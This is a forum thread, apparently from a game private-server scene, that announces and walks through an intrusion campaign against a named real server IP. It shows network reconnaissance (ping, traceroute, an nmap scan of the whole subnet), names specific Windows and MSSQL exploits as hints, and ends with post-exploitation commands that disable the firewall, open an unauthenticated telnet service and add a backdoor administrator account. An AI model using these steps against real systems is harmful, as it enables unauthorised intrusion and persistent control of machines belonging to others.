So, as thread subject says, operation "SRO Blitzkrieq" starts soon. More info comes in next few hours.
For mods, please, stick this thread - this is going to be interesting.
=========================================
SRO Blitzkrieq -> Beginning
So, here the stuff begins. As far as many of you already know, there is a vSRO test server running on the net out there.
The IP address is pretty well known to everyone out here.
Code:
123.30.200.70
You may try pinging it, to ensure it's up.
Code:
cmd -> ping 123.30.200.70
Let's trace route.
Code:
Code:
cmd -> tracert 123.30.200.70
Code:
7 277 ms 276 ms 276 ms 80.156.161.62 8 303 ms 304 ms 303 ms 203.162.217.25 9 304 ms 304 ms 303 ms static.vdc.vn [222.255.165.33] 10 313 ms 313 ms 313 ms 203.162.231.9 11 318 ms 318 ms 319 ms static.vdc.vn [123.30.63.26] 12 313 ms 313 ms 313 ms static.vdc.vn [123.30.63.66] 13 314 ms 314 ms 313 ms dynamic.vdc.vn [123.30.200.254] 14 313 ms 313 ms 313 ms dynamic.vdc.vn [123.30.200.70]
We see few gateways there, huh ? Seems like a pretty huge network, lulz.
Let's scan the "closest" machines to our target. (i'd preffer NMAP)
Code:
nmap -T4 -A -v 123.30.200.0-255
Tons of machines with MSSQL 2000 SP4 machines, available SMB services, ftp servers, etc...
=========================================
More hints comes shortly.
=========================================
Blitzkrieq -> Part 2
HINT :
Code:
ms netapi 067 ms 09_004_sp_replwritetovarbin
More hints comes shortly.
===========================================
SRO Blitzkrieq -> Part 3
Disabling firewall, starting telnet server. Many people asked for this...
Code:
netsh firewall set opmode disable sc config tlntsvr start= auto tlntadmn config port=23 sec=-NTLM net start Telnet net user Admin 7755xx! /add net localgroup Administrators Admin /add